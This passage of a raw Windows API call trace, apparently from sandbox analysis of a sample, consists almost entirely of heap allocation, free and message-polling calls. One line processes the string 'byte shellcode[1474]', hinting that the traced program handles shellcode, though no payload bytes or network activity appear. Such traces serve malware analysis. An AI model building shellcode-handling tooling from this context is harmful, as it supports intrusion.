lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0136.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe90 [0136.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd20 [0136.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0136.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0136.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0136.968] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0136.968] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0136.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0136.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0136.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0136.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0136.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd20 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0136.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0136.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0136.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0136.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0136.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.970] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0136.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0136.971] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0136.971] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.971] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.971] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.971] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.971] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0136.972] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0136.972] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0136.972] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0136.972] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0136.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.973] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001a8 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7040 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe90 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7040 | out: hHeap=0x12c0000) returned 1 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13025d8 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7058 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e78 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e78 | out: hHeap=0x12c0000) returned 1 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ff8 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0136.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ff8 | out: hHeap=0x12c0000) returned 1 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x13165e0 [0136.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f08 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x44) returned 0x1462c28 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e18 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7070 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f98 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f20 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7040 [0136.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e60 [0136.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ed8 [0136.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ef0 [0136.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f38 [0136.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7088 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e30 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e48 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fc8 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6fe0 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e78 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6de8 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ea8 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6fb0 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70a0 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e90 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ec0 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e00 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f50 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f68 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300310 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f80 [0136.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ff8 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7028 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0136.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302610 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70b8 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0136.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316600 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efce0 [0136.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302648 [0136.979] CharLowerBuffW (in: lpsz="byte shellcode[1474]", cchLength=0x14 | out: lpsz="byte shellcode[1474]") returned 0x14 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x13062f8 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7028 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcf0 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70b8 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6dd0 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71d8 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302178 [0136.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71d8 | out: hHeap=0x12c0000) returned 1 [0136.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0136.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300108 [0136.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302178 | out: hHeap=0x12c0000) returned 1 [0136.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0136.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0136.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0136.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0136.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0136.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302648 | out: hHeap=0x12c0000) returned 1 [0137.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0137.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302610 | out: hHeap=0x12c0000) returned 1 [0137.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0137.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ff8 | out: hHeap=0x12c0000) returned 1 [0137.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f80 | out: hHeap=0x12c0000) returned 1 [0137.086] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300310 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e18 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7070 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0137.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7040 | out: hHeap=0x12c0000) returned 1 [0137.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x13165e0 [0137.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x1305fc8 [0137.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e90 [0137.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efce0 [0137.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001d0 [0137.088] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0137.088] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0137.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7088 [0137.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0137.088] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.089] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0137.089] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.089] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0137.089] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.089] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, 